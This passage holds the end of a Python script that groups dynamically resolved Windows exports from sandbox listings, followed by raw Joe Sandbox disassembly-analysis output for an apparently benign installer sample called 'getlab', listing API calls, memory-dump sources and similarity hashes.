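            export = name if is_symbol(name) else (pending or "?")
            found.append((module or "?", export, m.group("ref")))
    return found


def by_dll(listing: str) -> Dict[str, List[str]]:
    """Group resolved exports per dll: what the import table does not show."""
    grouped: Dict[str, set] = {}
    for dll, export, _ in resolved_imports(listing):
        grouped.setdefault(dll, set()).add(export)
    return {dll: sorted(names) for dll, names in sorted(grouped.items())}


# Constructed sample: an excerpt of the listing on this page (uxtheme entries shortened).
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000), ref: 0042D902
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
Strings
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
APIs
  • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
  • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
  • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
APIs
  • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
• GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
"""

if __name__ == "__main__":
    for dll, export, ref in resolved_imports(SAMPLE):
        print(f"{ref}  {dll:<12} {export}")
```

Run against the full function listing of a report, by_dll gives the set of exports a sample reaches only through GetProcAddress, which is the list to compare with the static import table when deciding whether the indirection is ordinary compatibility probing (as the optional user32 and shell32 exports here suggest) or an attempt to hide capabilities.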
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238), ref: 0047CFB0
                                                                          • FindClose.KERNEL32(000000FF,0047CFDB,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238,00000000), ref: 0047CFCE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                                          • Instruction ID: d4706787225a87a8d466f388a3eb94f1c6a992d4ef98e923761ffbb9731f628b
                                                                          • Opcode Fuzzy Hash: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                                          • Instruction Fuzzy Hash: 32814B70D0024DAFCF11DF95CC91ADFBBB9EF49308F5080AAE808A7291D6399A46CF55
                                                                          APIs
                                                                            • Part of subcall function 0042EE28: GetTickCount.KERNEL32 ref: 0042EE2E
                                                                            • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
                                                                          • GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CountErrorFileLastMoveTick
                                                                          • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                          • API String ID: 2406187244-2685451598
                                                                          • Opcode ID: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                                          • Instruction ID: 7c456f6db07972d04682c0112793eede51d985a58d5564732b5c120557be107c
                                                                          • Opcode Fuzzy Hash: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                                          • Instruction Fuzzy Hash: 5D419670A006099BCB10EFA5D882ADF77B5EF48314F608537E404BB355E7B89E458BAD
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00413D3E
                                                                          • GetDesktopWindow.USER32 ref: 00413DF6
                                                                            • Part of subcall function 00418EB8: 6F59C6F0.COMCTL32(?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418ED4
                                                                            • Part of subcall function 00418EB8: ShowCursor.USER32(00000001,?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418EF1
                                                                          • SetCursor.USER32(00000000,?,?,?,?,00413AEB,00000000,00413AFE), ref: 00413E34
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CursorDesktopWindow$Show
                                                                          • String ID:
                                                                          • API String ID: 2074268717-0
                                                                          • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                          • Instruction ID: 9b0def8c9c64a2c96ee02a3ab3d0705208e3fbe4449c9c566199a376d490666d
                                                                          • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                          • Instruction Fuzzy Hash: D2411931600210AFC710DF2AFA84B5677A5EB69329B16807BE405CB365DB38ED81CF9C
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A65
                                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AD4
                                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B6F
                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString$FileMessageModuleName
                                                                          • String ID:
                                                                          • API String ID: 704749118-0
                                                                          • Opcode ID: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                                          • Instruction ID: 89cba0e7522a9b83fcc2071cfb28f1965358b02fab5b9b8693395207a1b0bde5
                                                                          • Opcode Fuzzy Hash: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                                          • Instruction Fuzzy Hash: A63110716083809AD330EB65CA45B9FB7D8AB85704F44483FB6C8E72D1DB7899048B6B
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E905
                                                                            • Part of subcall function 0044CF48: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF7A
                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E989
                                                                            • Part of subcall function 0042BBAC: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC0
                                                                          • IsRectEmpty.USER32(?), ref: 0044E94B
                                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E96E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                          • String ID:
                                                                          • API String ID: 855768636-0
                                                                          • Opcode ID: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                                          • Instruction ID: fae584cc962e85b422f7b584321c3529105593e75d7f1ff9ae22b75d4be52dd2
                                                                          • Opcode Fuzzy Hash: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                                          • Instruction Fuzzy Hash: F1116A71B4030067E610BA3A8C86B5B76C99B98748F15093FB505EB3C2DE7DDC0983A9
                                                                          APIs
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494E94
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494EAF
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494EC9
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494EE4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 177026234-0
                                                                          • Opcode ID: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                                          • Instruction ID: 1704218a4531d37ac2ab58ce54688b95f7f5c665c469e7ed4027bbe581d59bf2
                                                                          • Opcode Fuzzy Hash: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                                          • Instruction Fuzzy Hash: C42190BA704201AFCB00DE69CD85E6BB7DAEFC4340F148A3AF944C7249E638ED058755
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 00417258
                                                                          • SetCursor.USER32(00000000), ref: 0041729B
                                                                          • GetLastActivePopup.USER32(?), ref: 004172C5
                                                                          • GetForegroundWindow.USER32(?), ref: 004172CC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                          • String ID:
                                                                          • API String ID: 1959210111-0
                                                                          • Opcode ID: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                                          • Instruction ID: d8f212eab659ab8611038d963e52f28b2b0f2619fe8d71a0b25c9b868ff876e9
                                                                          • Opcode Fuzzy Hash: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                                          • Instruction Fuzzy Hash: B121B0303486008AC710AB69D944AEB33F1EF58724B1145BBF8459B392DB3DDC82CB8D
                                                                          APIs
                                                                          • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494AFD
                                                                          • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494B11
                                                                          • MulDiv.KERNEL32(F70A2BE8,00000008,?), ref: 00494B25
                                                                          • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00494B43
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                                          • Instruction ID: 4e21b8649f01b029d01931fbc34569bb41b57a17a8c4fb2cd57aac9c741bb68b
                                                                          • Opcode Fuzzy Hash: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                                          • Instruction Fuzzy Hash: 1F113072605104AFCF40DFA9C8C5E9B7BECEF8D320B1541AAF908DB246D634ED418B68
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,0041F468,?), ref: 0041F499
                                                                          • UnregisterClassA.USER32(0041F468,00400000), ref: 0041F4C2
                                                                          • RegisterClassA.USER32(00499598), ref: 0041F4CC
                                                                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F507
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                          • String ID:
                                                                          • API String ID: 4025006896-0
                                                                          • Opcode ID: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                                          • Instruction ID: e4d668e9dca91fd32e585eae6d60143d6dfbdf42e70c096e3b85bfad9ab1786c
                                                                          • Opcode Fuzzy Hash: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                                          • Instruction Fuzzy Hash: 63016D722001046BDB10EBACED81E9B3798A729314B10423FBA15E73A2D7399D458BAC
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D20F
                                                                          • LoadResource.KERNEL32(00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C,0000000A,00000000), ref: 0040D229
                                                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C), ref: 0040D243
                                                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?), ref: 0040D24D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                                          • Instruction ID: 3283e33870439dafd25d8e1e147512606e62b5bf6a0133693b61d2317928fdf1
                                                                          • Opcode Fuzzy Hash: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                                          • Instruction Fuzzy Hash: C5F04FB26056047F8B04EE99A881D5B77DDDE88264314027EF908EB242DA38DD018B69
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,=Y,?,?,?,004018B4), ref: 00401566
                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,=Y,?,?,?,004018B4), ref: 0040158B
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,=Y,?,?,?,004018B4), ref: 004015B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Alloc$Free
                                                                          • String ID: =Y
                                                                          • API String ID: 3668210933-2624468338
                                                                          • Opcode ID: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                          • Instruction ID: ed10fda1d5a177d2a0c43996bc0be7fa2989f050302610c9045c0a13ae1d279a
                                                                          • Opcode Fuzzy Hash: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                          • Instruction Fuzzy Hash: AFF0C8716403206AEB315A294C85F133AD4DBC5754F104075BE09FF3DAD6B8980082AC
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00470411
                                                                          Strings
                                                                          • Unsetting NTFS compression on file: %s, xrefs: 004703F7
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 00470422
                                                                          • Setting NTFS compression on file: %s, xrefs: 004703DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                          • API String ID: 1452528299-3038984924
                                                                          • Opcode ID: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                                          • Instruction ID: 0d596443d05caf7374ea98a63d842d8765eee9d82fb477a7c18f0f713548320e
                                                                          • Opcode Fuzzy Hash: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                                          • Instruction Fuzzy Hash: 3601A730E0924896CB14D7AD94412EDBBB48F09304F54C1EFB85CE7382DB780A098B9A
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 0046FC65
                                                                          Strings
                                                                          • Unsetting NTFS compression on directory: %s, xrefs: 0046FC4B
                                                                          • Setting NTFS compression on directory: %s, xrefs: 0046FC33
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046FC76
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                          • API String ID: 1452528299-1392080489
                                                                          • Opcode ID: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                                          • Instruction ID: 1ff60dd8eb5a114f2a7af6b3d642365226de0c959c43d8a3966afd89414ec8a0
                                                                          • Opcode Fuzzy Hash: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                                          • Instruction Fuzzy Hash: 5B011730E0824C56CB04D7ADA4412DDBBB4AF4D314F54C5BFA899D7382EA790A0D879B
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000,0045B5F5), ref: 00455DAC
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000), ref: 00455DB5
                                                                          • RemoveFontResourceA.GDI32(00000000), ref: 00455DC2
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DD6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                          • String ID:
                                                                          • API String ID: 4283692357-0
                                                                          • Opcode ID: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                                          • Instruction ID: 990a694f9916720730b0810028faebd1b23d30e86244cf38efb64550af4b0806
                                                                          • Opcode Fuzzy Hash: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                                          • Instruction Fuzzy Hash: 7CF090B274070036EA10B6B65C46F2B12DC8F54745F10883AB500EF2C3D57CDC044629
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CountSleepTick
                                                                          • String ID:
                                                                          • API String ID: 2227064392-0
                                                                          • Opcode ID: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                                          • Instruction ID: a2b460aa88ecba94892aad5d964071206a8b0d845d3bc1a6a013ae29a0728730
                                                                          • Opcode Fuzzy Hash: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                                          • Instruction Fuzzy Hash: 6FE02B627C916065C62131BE18C25BF464CCBC3364B24463FF0CCE7242C85D5C4A873E
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7,00000000), ref: 00477CA1
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 00477CA7
